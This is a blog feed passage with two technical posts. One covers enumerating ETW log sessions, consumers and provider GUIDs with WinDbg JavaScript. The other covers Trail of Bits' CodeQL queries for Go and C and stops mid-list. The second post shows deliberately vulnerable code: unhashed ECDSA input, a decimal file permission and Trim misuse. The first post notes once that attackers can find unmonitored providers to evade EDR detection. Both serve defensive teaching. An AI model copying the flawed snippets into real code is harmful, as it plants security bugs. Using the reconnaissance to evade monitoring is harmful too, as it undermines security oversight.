There are ways to find consumers of ETW log sessions from user mode. However, they only supply very partial information that isn’t enough in all cases. So instead, we’ll head to our kernel debugger session. One way to get information about ETW sessions from the debugger is using the built-in extension !wmitrace. This extremely useful extension allows users to investigate all of the running loggers and their attributes, consumers, and buffers. It even allows users to start and stop log sessions (on a live debugger connection). Still, like all legacy extensions, it has its limitations: it can’t be easily automated, and since it’s a precompiled binary it can’t be extended with new functionality.

So instead we’ll write a JavaScript script—scripts are easier to extend and modify, and we can use them to get as much data as we need without being limited to the preexisting functionality of a legacy extension.

Every handle contains a pointer to an object. For example, a file handle will point to a kernel structure of type FILE_OBJECT. A handle to an object of type EtwConsumer will point to an undocumented data structure called ETW_REALTIME_CONSUMER. This structure contains a pointer to the process that opened it, events that get notified for different actions, flags, and also one piece of information that will (eventually) lead us back to the log session—LoggerId. Using a custom script, we can scan the handle tables of all processes for handles to EtwConsumer objects. For each one, we can get the linked ETW_REALTIME_CONSUMER structure and print the LoggerId:

"use strict";

function initializeScript()
{
    return [new host.apiVersionSupport(1, 7)];
}


function EtwConsumersForProcess(process)
{
    let dbgOutput = host.diagnostics.debugLog;
    let handles = process.Io.Handles;

    try 
    {
        for (let handle of handles)
        {
            try
            {
                let objType = handle.Object.ObjectType;
                if (objType === "EtwConsumer")
                {
                    let consumer = host.createTypedObject(handle.Object.Body.address, "nt", "_ETW_REALTIME_CONSUMER");
                    let loggerId = consumer.LoggerId;

                    dbgOutput("Process ", process.Name, " with ID ", process.Id, " has handle ", handle.Handle, " to Logger ID ", loggerId, "\n");
                }
            } catch (e) {
                dbgOutput("\tException parsing handle ", handle.Handle, "in process ", process.Name, "!\n");
            }
        }
    } catch (e) {

    }
}

Next, we load the script into the debugger with .scriptload and call our function to identify which process consumes ETW events:

dx @$cursession.Processes.Select(p => @$scriptContents.EtwConsumersForProcess(p))
@$cursession.Processes.Select(p => @$scriptContents.EtwConsumersForProcess(p))                
Process svchost.exe with ID 0x558 has handle 0x7cc to Logger ID 31
Process svchost.exe with ID 0x114c has handle 0x40c to Logger ID 36
Process svchost.exe with ID 0x11f8 has handle 0x2d8 to Logger ID 17
Process svchost.exe with ID 0x11f8 has handle 0x2e8 to Logger ID 3
Process svchost.exe with ID 0x11f8 has handle 0x2f4 to Logger ID 9
Process NVDisplay.Container.exe with ID 0x1478 has handle 0x890 to Logger ID 38
Process svchost.exe with ID 0x1cec has handle 0x1dc to Logger ID 7
Process svchost.exe with ID 0x1d2c has handle 0x780 to Logger ID 8
Process CSFalconService.exe with ID 0x1e54 has handle 0x760 to Logger ID 3
Process CSFalconService.exe with ID 0x1e54 has handle 0x79c to Logger ID 45
Process CSFalconService.exe with ID 0x1e54 has handle 0xbb0 to Logger ID 10
Process Dell.TechHub.Instrumentation.SubAgent.exe with ID 0x25c4 has handle 0xcd8 to Logger ID 41
Process Dell.TechHub.Instrumentation.SubAgent.exe with ID 0x25c4 has handle 0xdb8 to Logger ID 35
Process Dell.TechHub.Instrumentation.SubAgent.exe with ID 0x25c4 has handle 0xf54 to Logger ID 44
Process SgrmBroker.exe with ID 0x17b8 has handle 0x178 to Logger ID 15
Process SystemInformer.exe with ID 0x4304 has handle 0x30c to Logger ID 16
Process PerfWatson2.exe with ID 0xa60 has handle 0xa3c to Logger ID 46
Process PerfWatson2.exe with ID 0x81a4 has handle 0x9c4 to Logger ID 40
Process PerfWatson2.exe with ID 0x76f0 has handle 0x9a8 to Logger ID 47
Process operfmon.exe with ID 0x3388 has handle 0x88c to Logger ID 48
Process operfmon.exe with ID 0x3388 has handle 0x8f4 to Logger ID 49

While we still don’t get the name of the log sessions, we already have more data than we did in user mode. We can see, for example, that some processes have multiple consumer handles since they are subscribed to multiple log sessions. Unfortunately, the ETW_REALTIME_CONSUMER structure doesn’t have any information about the log session besides its identifier, so we must find a way to match identifiers to human-readable names.

The registered loggers and their IDs are stored in a global list of loggers (or at least they were until the introduction of server silos; now, every isolated process will have its own separate ETW loggers while non-isolated processes will use the global list, which I will also use in this post). The global list is stored inside an ETW_SILODRIVERSTATE structure within the host silo globals, nt!PspHostSiloGlobals:

dx ((nt!_ESERVERSILO_GLOBALS*)&nt!PspHostSiloGlobals)->EtwSiloState
((nt!_ESERVERSILO_GLOBALS*)&nt!PspHostSiloGlobals)->EtwSiloState                 : 0xffffe38f3deeb000 [Type: _ETW_SILODRIVERSTATE *]
    [+0x000] Silo             : 0x0 [Type: _EJOB *]
    [+0x008] SiloGlobals      : 0xfffff8052bd489c0 [Type: _ESERVERSILO_GLOBALS *]
    [+0x010] MaxLoggers       : 0x50 [Type: unsigned long]
    [+0x018] EtwpSecurityProviderGuidEntry [Type: _ETW_GUID_ENTRY]
    [+0x1c0] EtwpLoggerRundown : 0xffffe38f3deca040 [Type: _EX_RUNDOWN_REF_CACHE_AWARE * *]
    [+0x1c8] EtwpLoggerContext : 0xffffe38f3deca2c0 [Type: _WMI_LOGGER_CONTEXT * *]
    [+0x1d0] EtwpGuidHashTable [Type: _ETW_HASH_BUCKET [64]]
    [+0xfd0] EtwpSecurityLoggers [Type: unsigned short [8]]
    [+0xfe0] EtwpSecurityProviderEnableMask : 0x3 [Type: unsigned char]
    [+0xfe4] EtwpShutdownInProgress : 0 [Type: long]
    [+0xfe8] EtwpSecurityProviderPID : 0x798 [Type: unsigned long]
    [+0xff0] PrivHandleDemuxTable [Type: _ETW_PRIV_HANDLE_DEMUX_TABLE]
    [+0x1010] RTBacklogFileRoot : 0x0 [Type: wchar_t *]
    [+0x1018] EtwpCounters     [Type: _ETW_COUNTERS]
    [+0x1028] LogfileBytesWritten : {4391651513} [Type: _LARGE_INTEGER]
    [+0x1030] ProcessorBlocks  : 0x0 [Type: _ETW_SILO_TRACING_BLOCK *]
    [+0x1038] ContainerStateWnfSubscription : 0xffffaf8de0386130 [Type: _EX_WNF_SUBSCRIPTION *]
    [+0x1040] ContainerStateWnfCallbackCalled : 0x0 [Type: unsigned long]
    [+0x1048] UnsubscribeWorkItem : 0xffffaf8de0202170 [Type: _WORK_QUEUE_ITEM *]
    [+0x1050] PartitionId      : {00000000-0000-0000-0000-000000000000} [Type: _GUID]
    [+0x1060] ParentId         : {00000000-0000-0000-0000-000000000000} [Type: _GUID]
    [+0x1070] QpcOffsetFromRoot : {0} [Type: _LARGE_INTEGER]
    [+0x1078] PartitionName    : 0x0 [Type: char *]
    [+0x1080] PartitionNameSize : 0x0 [Type: unsigned short]
    [+0x1082] UnusedPadding    : 0x0 [Type: unsigned short]
    [+0x1084] PartitionType    : 0x0 [Type: unsigned long]
    [+0x1088] SystemLoggerSettings [Type: _ETW_SYSTEM_LOGGER_SETTINGS]
    [+0x1200] EtwpStartTraceMutex [Type: _KMUTANT]

The EtwpLoggerContext field points to an array of pointers to WMI_LOGGER_CONTEXT structures, each describing one logger session. The size of the array is saved in the MaxLoggers field of the ETW_SILODRIVERSTATE. Not all entries of the array are necessarily used; unused entries will be set to 1. Knowing this, we can dump all of the initialized entries of the array. (I’ve hard-coded the array size for convenience):

dx ((nt!_WMI_LOGGER_CONTEXT*(*)[0x50])(((nt!_ESERVERSILO_GLOBALS*)&nt!PspHostSiloGlobals)->EtwSiloState->EtwpLoggerContext))->Where(l => l != 1)
((nt!_WMI_LOGGER_CONTEXT*(*)[0x50])(((nt!_ESERVERSILO_GLOBALS*)&nt!PspHostSiloGlobals)->EtwSiloState->EtwpLoggerContext))->Where(l => l != 1)                
    [2]              : 0xffffe38f3f0c9040 [Type: _WMI_LOGGER_CONTEXT *]
    [3]              : 0xffffe38f3fe07640 [Type: _WMI_LOGGER_CONTEXT *]
    [4]              : 0xffffe38f3f0c75c0 [Type: _WMI_LOGGER_CONTEXT *]
    [5]              : 0xffffe38f3f0c9780 [Type: _WMI_LOGGER_CONTEXT *]
    [6]              : 0xffffe38f3f0cb040 [Type: _WMI_LOGGER_CONTEXT *]
    [7]              : 0xffffe38f3f0cb600 [Type: _WMI_LOGGER_CONTEXT *]
    [8]              : 0xffffe38f3f0ce040 [Type: _WMI_LOGGER_CONTEXT *]
    [9]              : 0xffffe38f3f0ce600 [Type: _WMI_LOGGER_CONTEXT *]
    [10]             : 0xffffe38f79832a40 [Type: _WMI_LOGGER_CONTEXT *]
    [11]             : 0xffffe38f3f0d1640 [Type: _WMI_LOGGER_CONTEXT *]
    [12]             : 0xffffe38f89535a00 [Type: _WMI_LOGGER_CONTEXT *]
    [13]             : 0xffffe38f3dacc940 [Type: _WMI_LOGGER_CONTEXT *]
    [14]             : 0xffffe38f3fe04040 [Type: _WMI_LOGGER_CONTEXT *]
       …

Each logger context contains information about the logger session such as its name, the file that stores the events, the security descriptor, and more. Each structure also contains a logger ID, which matches the index of the logger in the array we just dumped. So given a logger ID, we can find its details like this:

dx (((nt!_ESERVERSILO_GLOBALS*)&nt!PspHostSiloGlobals)->EtwSiloState->EtwpLoggerContext)[@$loggerId]
 (((nt!_ESERVERSILO_GLOBALS*)&nt!PspHostSiloGlobals)->EtwSiloState->EtwpLoggerContext)[@$loggerId]                 : 0xffffe38f3f0ce600 [Type: _WMI_LOGGER_CONTEXT *]
    [+0x000] LoggerId         : 0x9 [Type: unsigned long]
    [+0x004] BufferSize       : 0x10000 [Type: unsigned long]
    [+0x008] MaximumEventSize : 0xffb8 [Type: unsigned long]
    [+0x00c] LoggerMode       : 0x19800180 [Type: unsigned long]
    [+0x010] AcceptNewEvents  : 0 [Type: long]
    [+0x018] GetCpuClock      : 0x0 [Type: unsigned __int64]
    [+0x020] LoggerThread     : 0xffffe38f3f0d0040 [Type: _ETHREAD *]
    [+0x028] LoggerStatus     : 0 [Type: long]
       …

Now we can implement this as a function (in DX or JavaScript) and print the logger name for each open consumer handle we find:

dx @$cursession.Processes.Select(p => @$scriptContents.EtwConsumersForProcess(p))
@$cursession.Processes.Select(p => @$scriptContents.EtwConsumersForProcess(p))                
Process svchost.exe with ID 0x558 has handle 0x7cc to Logger ID 31
    Logger Name: "UBPM"

Process svchost.exe with ID 0x114c has handle 0x40c to Logger ID 36
    Logger Name: "WFP-IPsec Diagnostics"

Process svchost.exe with ID 0x11f8 has handle 0x2d8 to Logger ID 17
    Logger Name: "EventLog-System"

Process svchost.exe with ID 0x11f8 has handle 0x2e8 to Logger ID 3
    Logger Name: "Eventlog-Security"

Process svchost.exe with ID 0x11f8 has handle 0x2f4 to Logger ID 9
    Logger Name: "EventLog-Application"

Process NVDisplay.Container.exe with ID 0x1478 has handle 0x890 to Logger ID 38
    Logger Name: "NOCAT"

Process svchost.exe with ID 0x1cec has handle 0x1dc to Logger ID 7
    Logger Name: "DiagLog"

Process svchost.exe with ID 0x1d2c has handle 0x780 to Logger ID 8
    Logger Name: "Diagtrack-Listener"

Process CSFalconService.exe with ID 0x1e54 has handle 0x760 to Logger ID 3
    Logger Name: "Eventlog-Security"
...

In fact, by using the logger array, we can build a better way to enumerate ETW log session consumers. Each logger context has a Consumers field, which is a linked list connecting all of the ETW_REALTIME_CONSUMER structures that are subscribed to this log session:

So instead of scanning the handle table of each and every process in the system, we can go directly to the loggers array and find the registered processes for each one:

function EtwLoggersWithConsumerProcesses()
{
    let dbgOutput = host.diagnostics.debugLog;
    let hostSiloGlobals = host.getModuleSymbolAddress("nt", "PspHostSiloGlobals");
    let typedhostSiloGlobals = host.createTypedObject(hostSiloGlobals, "nt", "_ESERVERSILO_GLOBALS");

    let maxLoggers = typedhostSiloGlobals.EtwSiloState.MaxLoggers;
    for (let i = 0; i < maxLoggers; i++)
    {
        // Unused slots in the EtwpLoggerContext array are set to 1, so skip them
        let loggerPointer = host.memory.readMemoryValues(typedhostSiloGlobals.EtwSiloState.EtwpLoggerContext.address.add(i * 8), 1, 8)[0];
        if (loggerPointer.compareTo(1) == 0)
        {
            continue;
        }
        let logger = host.createTypedObject(loggerPointer, "nt", "_WMI_LOGGER_CONTEXT");
        dbgOutput("Logger ID ", i, " - ", logger.LoggerName, "\n");

        // Walk the logger's Consumers list of _ETW_REALTIME_CONSUMER entries
        let consumers = host.namespace.Debugger.Utility.Collections.FromListEntry(logger.Consumers, "nt!_ETW_REALTIME_CONSUMER", "Links");
        for (let consumer of consumers)
        {
            dbgOutput("\tProcess: ", consumer.ProcessObject.SeAuditProcessCreationInfo.ImageFileName.Name, "\n");
        }
        dbgOutput("\n");
    }
}

Calling this function should get us the exact same results as earlier, only much faster!

After getting this part, we can continue to search for another piece of information that could be useful—the list of GUIDs that provide events to a log session.

Finding provider GUIDs

Finding the consumers of an ETW log session is only half the battle—we also want to know which providers notify each log session. We saw earlier that we can get that information from Performance Monitor, but let’s see how we can also get it from a debugger session, as it might be useful when the live machine isn’t available or when looking for details that aren’t supplied by user-mode tools like Performance Monitor.

If we look at the WMI_LOGGER_CONTEXT structure, we won’t see any details about the providers that notify the log session. To find this information, we need to go back to the ETW_SILODRIVERSTATE structure from earlier and look at the EtwpGuidHashTable field. This is an array of buckets storing all of the registered provider GUIDs. For performance reasons, the GUIDs are hashed and stored in 64 buckets. Each bucket contains three lists linking ETW_GUID_ENTRY structures. There is one list for each ETW_GUID_TYPE:

  • EtwpTraceGuidType
  • EtwpNotificationGuidType
  • EtwpGroupGuidType

Each ETW_GUID_ENTRY structure contains an EnableInfo array with eight entries, and each contains information about one log session that the GUID is providing events for (which means that an event GUID entry can supply events for up to eight different log sessions):

dt nt!_ETW_GUID_ENTRY EnableInfo.
   +0x080 EnableInfo  : [8] 
      +0x000 IsEnabled   : Uint4B
      +0x004 Level       : UChar
      +0x005 Reserved1   : UChar
      +0x006 LoggerId    : Uint2B
      +0x008 EnableProperty : Uint4B
      +0x00c Reserved2   : Uint4B
      +0x010 MatchAnyKeyword : Uint8B
      +0x018 MatchAllKeyword : Uint8B

Visually, this is what this whole thing looks like:

As we can see, the ETW_GUID_ENTRY structure contains a LoggerId field, which we can use as the index into the EtwpLoggerContext array to find the log session.

With this new information in mind, we can write a simple JavaScript function to print the GUIDs that match a logger ID. (In this case, I chose to go over only one ETW_GUID_TYPE at a time to make this code a bit cleaner.) Then we can go one step further and parse the ETW_REG_ENTRY list in each GUID entry to find out which processes notify it, or if it’s a kernel-mode provider:

function GetGuidsForLoggerId(loggerId, guidType)
{
    let dbgOutput = host.diagnostics.debugLog;

    let hostSiloGlobals = host.getModuleSymbolAddress("nt", "PspHostSiloGlobals");
    let typedhostSiloGlobals = host.createTypedObject(hostSiloGlobals, "nt", "_ESERVERSILO_GLOBALS");
    let guidHashTable = typedhostSiloGlobals.EtwSiloState.EtwpGuidHashTable;
    for (let bucket of guidHashTable)
    {
        let guidEntries = host.namespace.Debugger.Utility.Collections.FromListEntry(bucket.ListHead[guidType], "nt!_ETW_GUID_ENTRY", "GuidList");
        if (guidEntries.Count() != 0)
        {
            for (let guid of guidEntries)
            {
                for (let enableInfo of guid.EnableInfo)
                {
                    if (enableInfo.LoggerId === loggerId)
                    {
                        dbgOutput("\tGuid: ", guid.Guid, "\n");
                        let regEntryLinkField = "RegList";
                        if (guidType == 2)
                        {
                            // group GUIDs registration entries are linked through the GroupRegList field
                            regEntryLinkField = "GroupRegList";
                        }
                        let regEntries = host.namespace.Debugger.Utility.Collections.FromListEntry(guid.RegListHead, "nt!_ETW_REG_ENTRY", regEntryLinkField);
                        if (regEntries.Count() != 0)
                        {
                            dbgOutput("\tProvider Processes:\n");
                            for (let regEntry of regEntries)
                            {
                                if (regEntry.DbgUserRegistration != 0)
                                {
                                    dbgOutput("\t\tProcess: ", regEntry.Process.SeAuditProcessCreationInfo.ImageFileName.Name, " ID: ", host.parseInt64(regEntry.Process.UniqueProcessId.address, 16).toString(10), "\n");
                                }
                                else
                                {
                                    dbgOutput("\t\tKernel Provider\n");
                                }
                            }
                        }
                        break;
                    }
                }
            }
        }
    }
}

As an example, here are all of the trace provider GUIDs and the processes that notify them for ETW session UBPM (LoggerId 31 in my case):

dx @$scriptContents.GetGuidsForLoggerId(31, 0)
    Guid: {9E03F75A-BCBE-428A-8F3C-D46F2A444935}
    Provider Processes:
        Process: "\Device\HarddiskVolume3\Windows\System32\svchost.exe" ID: 2816
    Guid: {2D7904D8-5C90-4209-BA6A-4C08F409934C}
    Guid: {E46EEAD8-0C54-4489-9898-8FA79D059E0E}
    Provider Processes:
        Process: "\Device\HarddiskVolume3\Windows\System32\dwm.exe" ID: 2268
    Guid: {D02A9C27-79B8-40D6-9B97-CF3F8B7B5D60}
    Guid: {92AAB24D-D9A9-4A60-9F94-201FED3E3E88}
    Provider Processes:
        Process: "\Device\HarddiskVolume3\Windows\System32\svchost.exe" ID: 2100
        Kernel Provider
    Guid: {FBCFAC3F-8460-419F-8E48-1F0B49CDB85E}
    Guid: {199FE037-2B82-40A9-82AC-E1D46C792B99}
    Provider Processes:
        Process: "\Device\HarddiskVolume3\Windows\System32\lsass.exe" ID: 1944
    Guid: {BD2F4252-5E1E-49FC-9A30-F3978AD89EE2}
    Provider Processes:
        Process: "\Device\HarddiskVolume3\Windows\System32\svchost.exe" ID: 16292
    Guid: {22B6D684-FA63-4578-87C9-EFFCBE6643C7}
    Guid: {3635D4B6-77E3-4375-8124-D545B7149337}
    Guid: {0621B9DF-3249-4559-9889-21F76B5C80F3}
    Guid: {BD8FEA17-5549-4B49-AA03-1981D16396A9}
    Guid: {F5528ADA-BE5F-4F14-8AEF-A95DE7281161}
    Guid: {54732EE5-61CA-4727-9DA1-10BE5A4F773D}
    Provider Processes:
        Process: "\Device\HarddiskVolume3\Windows\System32\svchost.exe" ID: 4428
    Guid: {18F4A5FD-FD3B-40A5-8FC2-E5D261C5D02E}
    Guid: {8E6A5303-A4CE-498F-AFDB-E03A8A82B077}
    Provider Processes:
        Kernel Provider
    Guid: {CE20D1C3-A247-4C41-BCB8-3C7F52C8B805}
    Provider Processes:
        Kernel Provider
    Guid: {5EF81E80-CA64-475B-B469-485DBC993FE2}
    Guid: {9B307223-4E4D-4BF5-9BE8-995CD8E7420B}
    Provider Processes:
        Kernel Provider
    Guid: {AA1F73E8-15FD-45D2-ABFD-E7F64F78EB11}
    Provider Processes:
        Kernel Provider
    Guid: {E1BDC95E-0F07-5469-8E64-061EA5BE6A0D}
    Guid: {5B004607-1087-4F16-B10E-979685A8D131}
    Guid: {AEDD909F-41C6-401A-9E41-DFC33006AF5D}
    Guid: {277C9237-51D8-5C1C-B089-F02C683E5BA7}
    Provider Processes:
        Kernel Provider
    Guid: {F230D19A-5D93-47D9-A83F-53829EDFB8DF}
    Provider Processes:
        Process: "\Device\HarddiskVolume3\Windows\System32\svchost.exe" ID: 2816

Putting all of those steps together, we finally have a way to know which log sessions are running on the machine, which processes notify each of the GUIDs in the session, and which processes are subscribed to them. This can help us understand the purpose of different ETW log sessions running on the machine, such as identifying the log sessions used by EDR software or interesting hardware components. These scripts can also be modified as needed to identify ETW irregularities, such as a log session that has been disabled in order to blind security products. From an attacker’s perspective, gathering this information can tell us which ETW providers are used on a machine and which ones are ignored and, therefore, don’t present us with any risk of detection.

Overall, ETW is a very powerful mechanism, so getting more visibility into its internal workings is useful for attackers and defenders alike. This post only scratches the surface, and there’s so much more work that can be done in this area.

All of the JavaScript functions shown in this post can be found in this GitHub repo.

Publishing Trail of Bits’ CodeQL queries

6 December 2023 at 13:30

By Paweł Płatek

We are publishing a set of custom CodeQL queries for Go and C. We have used them to find critical issues that the standard CodeQL queries would have missed. This new release of a continuously updated repository of CodeQL queries joins our public Semgrep rules and Automated Testing Handbook in an effort to share our technical expertise with the community.

For the initial release of our internal CodeQL queries, we focused on issues like misused cryptography, insecure file permissions, and bugs in string methods:

  • Message not hashed before signature verification (Go): This query detects calls to (EC)DSA APIs with a message that was not hashed. If the message is longer than the expected hash digest size, it is silently truncated.
  • File permission flaws (Go): This query finds non-octal (e.g., 755 vs 0o755) and unsupported (e.g., 04666) literals used as a filesystem permission parameter (FileMode).
  • Trim functions misuse (Go): This query finds calls to strings.{Trim,TrimLeft,TrimRight} with the second argument not being a cutset but a continuous substring to be trimmed.
  • Missing MinVersion in tls.Config (Go): This query finds cases where tls.Config.MinVersion is not set explicitly for servers. By default, version 1.0 is used, which is considered insecure. This query does not mark explicitly set insecure versions.
  • CStrNFinder (C): This query finds calls to functions that take a string and its size as separate arguments (e.g., strncmp, strncat) but where the size argument is wrong.
  • Missing null terminator (C): This query finds incorrectly initialized strings that are passed to functions expecting null-byte-terminated strings.

CodeQL 101

CodeQL is the static analysis tool powering GitHub Advanced Security and is widely used throughout the community to discover vulnerabilities. CodeQL operates by transforming the code being tested into a database that is queryable using a Datalog-like language. While the core engine of CodeQL remains proprietary and closed source, the tool offers open-source libraries implementing various analyses and sets of security queries.

To test our queries, install the CodeQL CLI by following the official documentation. Once the CodeQL CLI is ready, download Trail of Bits’ query packs and check whether the new queries are detected:

codeql pack download trailofbits/{cpp,go}-queries
codeql resolve qlpacks | grep trailofbits

Now go to your project’s root directory and generate a CodeQL database, specifying either go or cpp as the programming language:

codeql database create codeql.db --language go

If the generation doesn’t succeed or the project has a complex build system, use the --command flag to specify the build command explicitly. Finally, execute Trail of Bits’ queries against the database:

codeql database analyze codeql.db --format=sarif-latest --output=./tob.sarif -- trailofbits/go-queries

Output of the analysis is in the Static Analysis Results Interchange Format (SARIF). Use Visual Studio Code with SARIF Viewer plugin to open it and triage findings. Alternatively, upload results to GitHub or use --format csv to get results in text form.

(EC)DSA silent input truncation in Go

Let’s sign the /etc/passwd file using ECDSA. Is the following implementation secure?

func main() {
    privateKey, err := ecdsa.GenerateKey(elliptic.P256(), rand.Reader)
    if err != nil { panic(err) }

    data, err := os.ReadFile("/etc/passwd")
    if err != nil { panic(err) }

    sig, err := ecdsa.SignASN1(rand.Reader, privateKey, data)
    if err != nil { panic(err) }
    fmt.Printf("signature: %x\n", sig)

    valid := ecdsa.VerifyASN1(&privateKey.PublicKey, data, sig)
    fmt.Println("signature verified:", valid)
}

Figure 1: An example signature generation and verification function

Of course it isn’t. The issue lies in passing raw, unhashed, and potentially long data to the ecdsa.SignASN1 and ecdsa.VerifyASN1 methods, while the Go crypto/ecdsa package (and a few other packages) expects data for signing and verification to be a hash of the actual data.

This behavior means that the code signs and verifies only the first 32 bytes of the file, as the size of the P-256 curve used in the example is 32 bytes.
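
In the example above, the most direct fix is to hash the data before signing and verifying it. Here is a minimal sketch of our own of the corrected calls, using crypto/sha256 (whose 32-byte digest matches the size of the P-256 order):

// Hash the file contents first; sign and verify the digest rather than the raw data.
digest := sha256.Sum256(data)

sig, err := ecdsa.SignASN1(rand.Reader, privateKey, digest[:])
if err != nil { panic(err) }

valid := ecdsa.VerifyASN1(&privateKey.PublicKey, digest[:], sig)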

The silent truncation of input data occurs in the hashToNat method, which is used internally by the ecdsa.{SignASN1,VerifyASN1} methods:

// hashToNat sets e to the left-most bits of hash, according to
// SEC 1, Section 4.1.3, point 5 and Section 4.1.4, point 3.
func hashToNat[Point nistPoint[Point]](c *nistCurve[Point], e *bigmod.Nat, hash []byte) {
    // ECDSA asks us to take the left-most log2(N) bits of hash, and use them as
    // an integer modulo N. This is the absolute worst of all worlds: we still
    // have to reduce, because the result might still overflow N, but to take
    // the left-most bits for P-521 we have to do a right shift.
    if size := c.N.Size(); len(hash) > size {
        hash = hash[:size]

Figure 2: The silent truncation of input data (crypto/ecdsa/ecdsa.go)

We have seen this vulnerability in real-world codebases and the impact was critical. To address the issue, there are a couple of approaches:

  1. Length validation. A simple approach to prevent the lack-of-hashing issues is to validate the length of the provided data, as done in the go-ethereum library.
    func VerifySignature(pubkey, msg, signature []byte) bool {
        if len(msg) != 32 || len(signature) != 64 || len(pubkey) == 0 {
            return false
        }

    Figure 3: Validation function from the go-ethereum library
    (go-ethereum/crypto/secp256k1/secp256.go#126–129)

  2. Static detection. Another approach is to statically detect the lack of hashing. For this purpose, we developed the tob/go/msg-not-hashed-sig-verify query, which detects all data flows to potentially problematic methods, ignoring flows that initiate from or go through a hashing function or slicing operation.

    An interesting problem we had to solve was how to set the starting points (sources) for the data flow analysis. We could have used the UntrustedFlowSource class, in which case the analysis would find flows from any input potentially controlled by an attacker. However, UntrustedFlowSource often needs to be extended per project to be useful, so relying on it would miss many flows in many projects. Therefore, our query focuses on finding the longest data flows, which are more likely to indicate potential vulnerabilities.

File permissions flaws in Go

Can you spot a bug in the code below?

if err := os.Chmod("./secret_key", 400); err != nil {
    return
}

Figure 4: Buggy Go code

Okay, so file permissions are usually represented as octal integers. In our case, the secret key file would end up with the permission set to 0o620 (or rw--w----), allowing non-owners to modify the file. The integer literal used in the call to the os.Chmod method is—most probably—not the one that a developer wanted to use.
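
The call the developer presumably intended uses an octal literal, which makes the secret key readable only by its owner:

if err := os.Chmod("./secret_key", 0o400); err != nil {
    return
}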

To find unexpected integer values used as FileModes, we implemented a WYSIWYG (“what you see is what you get”) heuristic in the tob/go/file-perms-flaws CodeQL query. The “what you see” is a cleaned-up integer literal (a hard-coded number of the FileMode type)—with removed underscores, a removed base prefix, and left-padded zeros. The “what you get” is the same integer converted to an octal representation. If these two parts are not equal, there may be a bug present.

// what you see
fileModeAsSeen = ("000" + fileModeLitStr.replaceAll("_", "").regexpCapture("(0o|0x|0b)?(.+)", 2)).regexpCapture("0*(.{3,})", 1)

// what you get
and fileModeAsOctal = octalFileMode(fileModeInt)

// what you see != what you get
and fileModeAsSeen != fileModeAsOctal

Figure 5: The WYSIWYG heuristic in CodeQL

To minimize false positives, we filter out numbers that are commonly used constants (like 0755 or 0644) but in decimal or hexadecimal form. These known, valid constants are explicitly defined in the isKnownValidConstant predicate. Here is how we implemented this predicate:

predicate isKnownValidConstant(string fileMode) {
  fileMode = ["365", "420", "436", "438", "511", "509", "493"]
  or
  fileMode = ["0x16d", "0x1a4", "0x1b4", "0x1b6", "0x1ff", "0x1fd", "0x1ed"]
}

Figure 6: The CodeQL predicate that filters out common file permission constants

Using non-octal representation of numbers isn’t the only possible pitfall when dealing with file permissions. Another issue to be aware of is the use of more than nine bits in calls to permission-changing methods. File permissions are encoded in only the lowest nine bits; the other bits encode file modes such as the sticky bit or setuid. Some permission-changing methods (such as os.Chmod or os.Mkdir) ignore a subset of the mode bits, depending on the operating system. The tob/go/file-perms-flaws query warns about this issue as well.

String trimming misuses in Go

API ambiguities are a common source of errors, especially when there are multiple methods with similar names and purposes accepting the same set of arguments. This is the case for Go’s strings.Trim family of methods. Consider the following calls:

strings.TrimLeft("file://FinnAndHengest", "file://")
strings.TrimPrefix("file://FinnAndHengest", "file://")

Figure 7: Ambiguous Trim methods

Can you tell the difference between these calls and determine which one works “as expected”?

According to the documentation, the strings.TrimLeft method accepts a cutset (i.e., a set of characters) for removal, rather than a prefix. Consequently, it deletes more characters than one would expect. While the above example may seem innocent, a bug in a cross-site scripting (XSS) sanitization function, for example, could have devastating consequences.
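
To make the difference concrete, here is a small example of our own (the file://file.txt input is illustrative) where the two calls diverge:

// TrimLeft treats "file://" as a set of characters {f, i, l, e, :, /} and keeps removing
// leading characters from that set, so it also consumes the "file" in "file.txt".
fmt.Println(strings.TrimLeft("file://file.txt", "file://"))   // prints ".txt"

// TrimPrefix removes the literal prefix "file://" exactly once.
fmt.Println(strings.TrimPrefix("file://file.txt", "file://")) // prints "file.txt"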

When looking for misused strings.Trim{Left,Right} calls, the tricky part is defining what qualifies as “expected” behavior. To address this challenge, we developed the tob/go/trim-misuse CodeQL query with simple heuristics to differentiate between valid and possibly mistaken calls, based on the cutset argument. We consider a Trim operation invalid if the argument contains repeated characters or meets all of the following conditions:

  • Is longer than two characters
  • Contains at least two consecutive alphanumeric characters
  • Is not a common run of consecutive characters (such as "1234567" or the alphabet)

While the heuristics look oversimplified, they worked well enough in our audits. In CodeQL, the above rules are implemented as shown below. The cutset is a variable corresponding to the cutset argument of a strings.Trim{Left,Right} method call.

// repeated characters imply the bug
cutset.length() != unique(string c | c = cutset.charAt(_) | c).length()

or
(
// long strings are considered suspicious
cutset.length() > 2

// at least one alphanumeric
and exists(cutset.regexpFind("[a-zA-Z0-9]{2}", _, _))

// exclude probable false-positives
and not cutset.matches("%1234567%")
and not cutset.matches("%abcdefghijklmnopqrstuvwxyz%")
)

Figure 8: CodeQL implementation of heuristics for a Trim operation

Interestingly, misuses of the strings.Trim methods are so common that Go developers are considering deprecating and replacing the problematic functions.

Identifying missing minimum TLS version configurations in Go

When using static analysis tools, it’s important to know their limitations. The official go/insecure-tls CodeQL query finds TLS configurations that accept insecure (outdated) TLS versions (e.g., SSLv3, TLSv1.1). It accomplishes that task by comparing values provided to the configuration’s MinVersion and MaxVersion settings against a list of deprecated versions. However, the query does not warn about configurations that do not explicitly set the MinVersion.

Why should this be a concern? The reason is that the default MinVersion for servers is TLSv1.0. Therefore, in the example below, the official query would mark only server_explicit as insecurely configured, despite both servers using the same MinVersion.

server_explicit := &http.Server{
    TLSConfig: &tls.Config{MinVersion: tls.VersionTLS10}
}
server_default := &http.Server{TLSConfig: &tls.Config{}}

Figure 9: Explicit and default configuration of the MinVersion setting

The severity of this issue is rather low since the default MinVersion for clients is a secure TLSv1.2. Nevertheless, we filled the gap and developed the tob/go/missing-min-version-tls CodeQL query, which detects tls.Config structures without the MinVersion field explicitly set. The query skips reporting configurations used for clients and limits false positives by filtering out findings where the MinVersion is set after the structure initialization.
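
Whichever query you rely on, the remediation is the same: set MinVersion explicitly when building a server’s tls.Config. For example:

server := &http.Server{
    TLSConfig: &tls.Config{
        MinVersion: tls.VersionTLS12, // require TLS 1.2 or newer
    },
}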

String bugs in C and C++

Building on top of the insightful cstrnfinder research conducted by one of my Trail of Bits colleagues, we developed the tob/cpp/cstrnfinder query. This query aims to identify invalid numeric constants provided to calls to functions that expect a string and its corresponding size as input—such as strncmp, strncpy, and memmove. We focused on detecting three erroneous cases:

  • Buffer underread. This occurs when the size argument (number 20 in the example below) is slightly smaller than the source string’s length:
